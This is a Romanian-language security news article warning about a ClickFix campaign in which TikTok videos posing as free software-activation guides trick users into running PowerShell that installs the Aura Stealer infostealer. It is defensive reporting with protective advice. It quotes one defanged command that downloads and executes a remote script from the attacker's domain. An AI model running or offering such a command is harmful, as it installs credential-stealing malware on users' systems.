campanie de atacuri informatice care folosește videoclipuri TikTok pentru a răspândi malware de tip infostealer a atras atenția experților în securitate cibernetică. Sub pretextul unor ghiduri gratuite de activare pentru Windows, Microsoft 365, Adobe Premiere, Photoshop sau Spotify Premium, atacatorii conving utilizatorii să ruleze comenzi PowerShell periculoase. Specialiștii avertizează că tehnica, denumită ClickFix, se răspândește rapid pe platforma video.

Modul de funcționare al atacurilor ClickFix pe TikTok
Fiecare video prezintă o comandă scurtă, aparent inofensivă, și solicită rularea acesteia cu privilegii de administrator în PowerShell. Exemplu tipic: iex (irm slmgr[.]win/photoshop). URL‑ul variază în funcție de programul pretins a fi activat, iar comanda stabilește o conexiune cu site‑ul compromis slmgr[.]win.

Descărcarea și executarea scriptului malițios
După inițializarea comenzii, scriptul PowerShell preia două fișiere executabile de pe servere găzduite prin Cloudflare. Primul, updater.exe, este o variantă a malware‑ului Aura Stealer, specializat în colectarea de parole salvate, cookie‑uri, date de portofele crypto și acreditări din aplicații diverse. Datele furate sunt trimise apoi către serverele controlate de infractori.

Fișierul source.exe și compilarea în memorie
Al doilea fișier, source.exe, descarcă cod sursă și îl compilează în memorie folosind compilatorul C# integrat în .NET (csc.exe). Scopul final al acestei operații rămâne neclar, însă componenta suplimentară poate servi pentru încărcarea de module suplimentare sau pentru evaziune avansată.

Riscuri majore pentru utilizatori
Utilizatorii care au executat comanda pot considera că toate datele de autentificare au fost compromise. Malware‑ul infostealer poate expune parole, tokenuri și informații financiare, facilitând furtul de identitate și acces neautorizat la conturi. În plus, componenta descărcată prin source.exe poate sprijini atacuri de tip ransomware sau furt de criptomonede.

Recomandări de securitate

  • Schimbați imediat parolele pentru toate conturile online și activați autentificarea în doi pași.
  • Evitați copierea și rularea oricăror comenzi găsite în videoclipuri TikTok, site‑uri sau mesaje nesolicitate.
  • Actualizați sistemul de operare, aplicațiile și soluțiile de securitate antivirus la ultimele versiuni.
  • Monitorizați traficul de rețea pentru conexiuni neautorizate către domenii necunoscute.
  • Utilizați conturi cu privilegii limitate pentru activitățile cotidiene, rezervând drepturile de administrator doar pentru sarcini strict necesare.

Importanța informării continue și monitorizării evoluțiilor în domeniul securității cibernetice rămâne esențială pentru a contracara noi campanii de atacuri informatice și amenințările generate de malware de tip infostealer.